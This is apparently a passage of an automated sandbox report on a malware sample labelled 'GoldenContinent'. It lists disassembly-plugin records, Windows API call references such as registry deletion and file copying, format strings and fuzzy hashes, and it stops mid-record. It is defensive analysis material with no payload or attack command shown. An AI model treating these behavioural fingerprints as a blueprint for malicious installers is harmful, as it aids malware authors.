                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                            • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                            • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                            • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                            • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                            • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                            • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                            • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                            • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                            • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                              • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                              • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                            • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                            • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                            • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                            • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                            • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                            • String ID: %02x%c$...
                                                                                                                                                                                                                                                                            • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                            • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                            • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                                                              • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                            • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                            • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                            • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                            • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                            • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00429E6D,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                            • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                                                              • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                            • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                            • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                            • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                                                            • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                                                            • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                            • String ID: Version
                                                                                                                                                                                                                                                                            • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                            • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                            • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                            • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                            • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                            • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                            • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                            • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                              • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                            • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                            • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                            • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                            • String ID: !N~
